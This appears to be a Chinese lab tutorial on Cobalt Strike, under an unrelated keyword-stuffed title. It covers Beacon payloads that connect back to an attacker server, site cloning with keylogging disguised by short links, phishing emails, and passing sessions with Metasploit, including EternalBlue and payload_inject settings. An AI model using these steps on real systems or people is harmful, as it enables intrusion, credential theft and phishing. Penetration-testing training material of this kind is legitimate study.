怎样做能让招聘网站记住密码,网站搭建实训总结,阐述企业搭建网站的重要性,centos卸载wordpress1.上线机器的Beacon的常用命令
2.信息收集和网站克隆
3.钓鱼邮件
4.CS传递会话到MSF
5.MSF会话传递到CS 1上线机器的Beacon的常用命令
介绍#xff1a;CobaltStrike分为服务端和客户端#xff0c;一般我们将服务端放在kali#xff0c;客户端可以在物理机上面#xff0…1.上线机器的Beacon的常用命令
2.信息收集和网站克隆
3.钓鱼邮件
4.CS传递会话到MSF
5.MSF会话传递到CS 1上线机器的Beacon的常用命令
介绍CobaltStrike分为服务端和客户端一般我们将服务端放在kali客户端可以在物理机上面或者虚拟机都可以
启动服务端首先创建一个监听注意这里要关闭kali的Apache服务要不然端口占用创建监听不成功
payload选择Beacon HTTP ,HTTP Hosts选择服务器的IP 点击save 接着我们用CS生成一个payloadWindows exe,使得我靶机上线 Lisrener选择我们创建的监听服务点击Launch 接着会生成一段payload只要我们将这段payload在其他机器的winR上粘贴运行机器就会上线 利用
打开CS上方的小云朵会出现我们刚刚生成的web服务 选中服务点击下方的Copy URL 启动我们的Windows10靶机使用winR然后将我们复制的粘贴上去点击确定
靶机上线 接着右击打开命令窗口输入命令就可以查看目标机器信息
常用命令
1.调节时间可以更快的看到执行命令sleep 3 务必执行要不然回显太慢
2.如果有的命令没有找到提示Unknow command:命令前加shell比如shell whoami
3.查看局域网情况net view
4.我们可以可以对机器进行浏览器代理、VNC桌面交互、文件浏览、网络探测、端口扫描、进程列表和屏幕截图等等这里不再一一展示 2.信息收集和网站克隆
信息收集
生成的一个网页我们直接Launch即可
这时候会生成一个网址 只要别人在内网中访问这个网址我们就可以得到机器信息
使用Windows10访问
我们就可以在CS中的web log中获取机器的信息
网站克隆
我们输入我们需要克隆的网址这里我选择的是百度然后选择路径Attack是攻击的站点可以选也可以不选这里我选的是信息收集的站点开启键盘记录 生成成功 如果我们要发给别人让其访问但是这样别人一看就不是正常的网址我们可以用短链接修饰一下使他看起来更有迷惑性
这里可以随便选我选的第一个浏览器访问
之前开了键盘记录随便输一个pengyuyan
查看CS的web log: 记录成功 3.钓鱼邮件 第一个Targets:目标我们新建一个文本文件将想要发送邮件的目标地址写上去
第二个Template:就是模版我们可以登录自己的邮箱自己给自己发送一封邮件然后点击导出eml文件注意这里的邮件内容自己编写可以把自己克隆的网站写上去 第三个Attachment就是附件可以不填也可以填一个可执行程序
第四个Embed URL:嵌入URL地址同样可以写我们监听的地址
第五个邮件服务器 第一个和第二个固定第三个是自己邮箱第四个是授权码需要我们自己生成
SSL连接
注意这里要开启服务才行 第六个填写自己的邮箱地址
最后点击发送这里是用我自己邮箱测试查看自己的邮箱果然发送成功 4.CS传递会话到MS
打开MSF建立监听
注意这里需要使用的HTTP服务写上本机IP运行
打开CS我们新建一个监听器
点击save
然后选择靶机右键
选择我们新建的监听器
等待MSF连接 连接成功 5.MSF会话传递到CS 我们打开Windows7使用永恒之蓝漏洞先让MSF上线 接着进行设置 返回后台bg use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set lhost 192.168.11.128 # CS服务端IP set lport 4444 # CS服务端监听的端口号 set DisablePayloadHandler True set PrependMigrate True set session 1 # 会话id run 打开CS创建一个新的监听器 save,等待上线 成功上线
